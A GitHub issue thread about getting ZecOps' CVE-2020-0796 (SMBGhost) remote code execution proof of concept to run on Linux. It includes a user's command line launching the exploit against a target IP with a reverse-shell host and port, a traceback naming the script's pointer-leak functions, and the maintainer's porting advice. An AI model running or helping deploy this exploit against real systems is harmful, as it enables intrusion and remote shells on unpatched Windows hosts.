Skip to content
This repository has been archived by the owner on May 9, 2023. It is now read-only.

AttributeError: module 'ctypes' has no attribute 'windll' #6

Open
raymondyeo88 opened this issue Jun 14, 2020 · 9 comments
Open

AttributeError: module 'ctypes' has no attribute 'windll' #6

raymondyeo88 opened this issue Jun 14, 2020 · 9 comments

Comments

@raymondyeo88
Copy link

Hi,

i have received this error message after executed the SMBleedingGhost.py script and the output of the error message is:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.131 192.168.75.129 4444
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.

Traceback (most recent call last):
File "SMBleedingGhost.py", line 909, in
exploit(target_ip, reverse_shell_ip, int(reverse_shell_port))
File "SMBleedingGhost.py", line 854, in exploit
allocation_pool_object_ptr = leak_allocation_pool_object_ptr(ip_address)
File "SMBleedingGhost.py", line 522, in leak_allocation_pool_object_ptr
address = leak_ptr(ip_address, ptr_offset, ptr_list)
File "SMBleedingGhost.py", line 480, in leak_ptr
byte_value = leak_ptr_byte(ip_address, ptr_offset + byte_index, ptr_list)
File "SMBleedingGhost.py", line 454, in leak_ptr_byte
if leak_if_ptr_byte_larger_than_value(ip_address, byte_offset, ptr_list, mid):
File "SMBleedingGhost.py", line 414, in leak_if_ptr_byte_larger_than_value
data = b'B'*offset + compress(payload)
File "SMBleedingGhost.py", line 272, in compress
RtlCompressBuffer = ctypes.windll.ntdll.RtlCompressBuffer
AttributeError: module 'ctypes' has no attribute 'windll'
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

Please help and i would appreciate the assistance. =)
@Michael-ZecOps
Copy link

The script is designed to run on Windows due to the way the compress function is implemented:
https://github.com/ZecOps/CVE-2020-0796-RCE-POC/blob/b9d4bfd8d820feaa60b9bc41ac059482e6f8bdb1/SMBleedingGhost.py#L256-L292

You can try replacing it with a cross platform implementation, such as this one:
https://github.com/you0708/lznt1

@raymondyeo88
Copy link
Author

Hi,

Thank you for the swift response.
Does it means to say that i need to install python on a Windows 10 machine and run the script on a Windows 10 machine ? Just to clarify.

@Michael-ZecOps
Copy link

Yes, that's one way. Another way is to use an alternative implementation of the compression which doesn't depend on Windows API.

@raymondyeo88
Copy link
Author

Noted and i will also try out the alternative implementation of the compression as stated above.

You are awesome =)

@Darkcast
Copy link

wish there was a version that would run on linux like kali.

@coding-today
Copy link

Oh no! Only use in windows?

@naffa339434
Copy link

i have a question i am getting an error (module 'ctypes' has no attribute 'windll' ) on colab when i am import pyditectinput can you help me out on this. Does this has anything to do with a VM

@aravindsunkarNTTData
Copy link

have you found any alternative implementation to use with Ubuntu? could you please suggest if any come across?

@ereshmittal
Copy link

i have a question i am getting an error (module 'ctypes' has no attribute 'windll' ) on colab when i am import pyditectinput can you help me out on this. Does this has anything to do with a VM

have you resolved this as i have run into the same error?

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
7 participants
@Darkcast @coding-today @raymondyeo88 @Michael-ZecOps @ereshmittal @naffa339434 @aravindsunkarNTTData